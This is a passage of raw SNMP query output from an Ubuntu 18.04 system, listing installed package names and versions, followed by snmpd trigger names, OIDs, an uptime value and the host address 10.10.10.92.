"python3-blinker-1.4+dfsg1-0.1"
"python3-certifi-2018.1.18-2"
"python3-cffi-backend-1.11.5-1"
"python3-chardet-3.0.4-1"
"python3-click-6.7-3"
"python3-colorama-0.3.7-1"
"python3-commandnotfound-18.04.4"
"python3-configobj-5.0.6-2"
"python3-constantly-15.1.0-1"
"python3-cryptography-2.1.4-1ubuntu1.1"
"python3-dbus-1.2.6-1"
"python3-debconf-1.5.66"
"python3-debian-0.1.32"
"python3-distro-info-0.18"
"python3-distupgrade-1:18.04.17"
"python3-gdbm-3.6.5-3"
"python3-gi-3.26.1-2"
"python3-httplib2-0.9.2+dfsg-1"
"python3-hyperlink-17.3.1-2"
"python3-idna-2.6-1"
"python3-incremental-16.10.1-3"
"python3-jinja2-2.10-1"
"python3-json-pointer-1.10-1"
"python3-jsonpatch-1.19+really1.16-1fakesync1"
"python3-jsonschema-2.6.0-2"
"python3-jwt-1.5.3+ds1-1"
"python3-markupsafe-1.0-1build1"
"python3-minimal-3.6.5-3"
"python3-newt-0.52.20-1ubuntu1"
"python3-oauthlib-2.0.6-1"
"python3-openssl-17.5.0-1ubuntu1"
"python3-pam-0.4.2-13.2ubuntu4"
"python3-pkg-resources-39.0.1-2"
"python3-problem-report-2.20.9-0ubuntu7"
"python3-pyasn1-0.4.2-3"
"python3-pyasn1-modules-0.2.1-0.2"
"python3-requests-2.18.4-2"
"python3-requests-unixsocket-0.1.5-3"
"python3-serial-3.4-2"
"python3-service-identity-16.0.0-2"
"python3-six-1.11.0-2"
"python3-software-properties-0.96.24.32.1"
"python3-systemd-234-1build1"
"python3-twisted-17.9.0-2"
"python3-twisted-bin-17.9.0-2"
"python3-update-manager-1:18.04.11"
"python3-urllib3-1.22-1"
"python3-yaml-3.12-1build2"
"python3-zope.interface-4.3.2-1build2"
"python3.6-3.6.5-3"
"python3.6-minimal-3.6.5-3"
"readline-common-7.0-3"
"rsync-3.1.2-2.1ubuntu1"
"rsyslog-8.32.0-1ubuntu4"
"run-one-1.17-0ubuntu1"
"screen-4.6.2-1"
"sed-4.4-2"
"sensible-utils-0.0.12"
"shared-mime-info-1.9-2"
"snmpd-5.7.3+dfsg-1.8ubuntu3"
"software-properties-common-0.96.24.32.1"
"sosreport-3.5-1ubuntu3"
"ssh-import-id-5.7-0ubuntu1"
"ssl-cert-1.0.39"
"strace-4.21-1ubuntu1"
"sudo-1.8.21p2-3ubuntu1"
"systemd-237-3ubuntu10"
"systemd-sysv-237-3ubuntu10"
"sysvinit-utils-2.88dsf-59.10ubuntu1"
"tar-1.29b-2"
"tcpdump-4.9.2-3"
"telnet-0.17-41"
"thermald-1.7.0-5ubuntu1"
"time-1.7-25.1build1"
"tmux-2.6-3"
"tzdata-2018d-1"
"ubuntu-advantage-tools-17"
"ubuntu-keyring-2018.02.28"
"ubuntu-minimal-1.417"
"ubuntu-release-upgrader-core-1:18.04.17"
"ubuntu-standard-1.417"
"ucf-3.0038"
"udev-237-3ubuntu10"
"ufw-0.35-5"
"uidmap-1:4.5-1ubuntu1"
"unattended-upgrades-1.1ubuntu1"
"unzip-6.0-21ubuntu1"
"update-manager-core-1:18.04.11"
"update-notifier-common-3.192.1"
"ureadahead-0.100.0-20"
"usbutils-1:007-4build1"
"util-linux-2.31.1-0.4ubuntu3"
"uuid-runtime-2.31.1-0.4ubuntu3"
"vim-2:8.0.1453-1ubuntu1"
"vim-common-2:8.0.1453-1ubuntu1"
"vim-runtime-2:8.0.1453-1ubuntu1"
"vim-tiny-2:8.0.1453-1ubuntu1"
"wget-1.19.4-1ubuntu2.1"
"whiptail-0.52.20-1ubuntu1"
"wireless-regdb-2016.06.10-0ubuntu1"
"xauth-1:1.0.10-1"
"xdelta3-3.0.11-dfsg-1ubuntu1"
"xdg-user-dirs-0.17-1ubuntu1"
"xfsprogs-4.9.0+nmu1ubuntu2"
"xkb-data-2.23.1-1ubuntu1"
"xxd-2:8.0.1453-1ubuntu1"
"xz-utils-5.2.2-1.3"
"zerofree-1.0.4-1"
"zlib1g-1:1.2.11.dfsg-0ubuntu2"
"_snmpd"
"_snmpd"
"_snmpd"
"_snmpd"
"_snmpd"
"_snmpd"
"_linkUpDown"
"_linkUpDown"
"_triggerFail"
"_triggerFire"
"_triggerFire"
"_triggerFire"
1000
1440
1
0
0:0:00:00.74
"07 E2 0A 05 0D 03 09 00 2B 00 00 "
""
""
""
iso.3.6.1.6.3.1.1.5.1
iso.3.6.1.2.1.1.3.0
iso.3.6.1.6.3.18.1.3.0
iso.3.6.1.6.3.1.1.4.3.0
3
5
7
0:0:00:00.74
10.10.10.92
iso.3.6.1.4.1.8072.3.2.10
